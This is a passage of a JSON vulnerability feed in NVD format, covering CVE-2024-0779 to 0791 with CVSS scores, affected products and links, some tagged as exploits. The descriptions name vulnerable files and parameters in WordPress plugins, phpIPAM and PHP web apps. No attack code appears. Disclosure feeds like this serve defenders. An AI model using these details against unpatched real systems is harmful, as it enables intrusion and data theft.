} ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:uniview:isc_2500-s:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-22T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0779", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/", "name" : "https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/", "name" : "https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation and CSRF in various function hooked to admin_init, allowing unauthenticated users to call them and unlink arbitrary users Instagram Account for example" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mediabetaprojects:enjoy_social_feed:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "6.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-05-05T18:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0780", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/", "name" : "https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/", "name" : "https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation when resetting its database, allowing any authenticated users, such as subscriber to perform such action" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mediabetaprojects:enjoy_social_feed:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "6.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-03-14T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0781", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS", "name" : "https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS", "name" : "https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251697", "name" : "https://vuldb.com/?ctiid.251697", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251697", "name" : "https://vuldb.com/?ctiid.251697", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251697", "name" : "https://vuldb.com/?id.251697", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251697", "name" : "https://vuldb.com/?id.251697", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:martmbithi:internet_banking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-22T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0782", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing", "name" : "https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing", "name" : "https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251698", "name" : "https://vuldb.com/?ctiid.251698", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.251698", "name" : "https://vuldb.com/?ctiid.251698", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.251698", "name" : "https://vuldb.com/?id.251698", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.251698", "name" : "https://vuldb.com/?id.251698", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:online_railway_reservation_system_project:online_railway_reservation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-22T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0783", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC", "name" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC", "name" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py", "name" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py", "name" : "https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251699", "name" : "https://vuldb.com/?ctiid.251699", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251699", "name" : "https://vuldb.com/?ctiid.251699", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251699", "name" : "https://vuldb.com/?id.251699", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251699", "name" : "https://vuldb.com/?id.251699", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:online_admission_system_project:online_admission_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-22T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0784", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/octopus_SQL/blob/main/report.md", "name" : "https://github.com/biantaibao/octopus_SQL/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/biantaibao/octopus_SQL/blob/main/report.md", "name" : "https://github.com/biantaibao/octopus_SQL/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251700", "name" : "https://vuldb.com/?ctiid.251700", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251700", "name" : "https://vuldb.com/?ctiid.251700", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251700", "name" : "https://vuldb.com/?id.251700", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251700", "name" : "https://vuldb.com/?id.251700", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hongmaple:octopus:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-22T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0786", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979", "name" : "https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979", "name" : "https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Conversios – Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the ee_syncProductCategory function using the parameters conditionData, valueData, productArray, exclude and include in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tatvic:conversios.io:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "7.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-02-07T01:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0787", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-307" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/phpipam/phpipam/commit/55c2056068be9f1359e967fcff64db6b7f4d00b5", "name" : "https://github.com/phpipam/phpipam/commit/55c2056068be9f1359e967fcff64db6b7f4d00b5", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/840cb582-1feb-43ab-9cc4-e4b5a63c5bab", "name" : "https://huntr.com/bounties/840cb582-1feb-43ab-9cc4-e4b5a63c5bab", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "phpIPAM version 1.5.1 contains a vulnerability where an attacker can bypass the IP block mechanism to brute force passwords for users by using the 'X-Forwarded-For' header. The issue lies in the 'get_user_ip()' function in 'class.Common.php' at lines 1044 and 1045, where the presence of the 'X-Forwarded-For' header is checked and used instead of 'REMOTE_ADDR'. This vulnerability allows attackers to perform brute force attacks on user accounts, including the admin account. The issue is fixed in version 1.7.0." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-11-15T11:15Z", "lastModifiedDate" : "2024-11-19T15:53Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0788", "ASSIGNER" : "help@fluidattacks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fluidattacks.com/advisories/brubeck/", "name" : "https://fluidattacks.com/advisories/brubeck/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://fluidattacks.com/advisories/brubeck/", "name" : "https://fluidattacks.com/advisories/brubeck/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.superantispyware.com/professional-x-edition.html", "name" : "https://www.superantispyware.com/professional-x-edition.html", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.superantispyware.com/professional-x-edition.html", "name" : "https://www.superantispyware.com/professional-x-edition.html", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "SUPERAntiSpyware Pro X v10.0.1260 is vulnerable to kernel-level API parameters manipulation and Denial of Service vulnerabilities by triggering the 0x9C402140 IOCTL code of the saskutil64.sys driver." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:realdefen:superantispyware:10.0.1260:*:*:*:professional_x:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "HIGH", "baseScore" : 6.6, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 4.7 } }, "publishedDate" : "2024-01-29T17:15Z", "lastModifiedDate" : "2025-05-19T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0789", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Maintenance plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 6.1.9.2 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to bypass maintenance mode." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-19T08:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0790", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "name" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "name" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8.1. This is due to missing or incorrect nonce validation on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions. This makes it possible for unauthenticated attackers to create, modify and delete taxonomy terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Furthermore, the functions wpbe_save_options, wpbe_bulk_delete_posts_count, wpbe_bulk_delete_posts, and wpbe_save_meta are vulnerable to Cross-Site Request Forgery allowing for plugin options update, post count deletion, post deletion and modification of post metadata via forged request." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pluginus:wolf_-_wordpress_posts_bulk_editor_and_products_manager_professional:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.8.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0791", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "name" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "name" : "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : 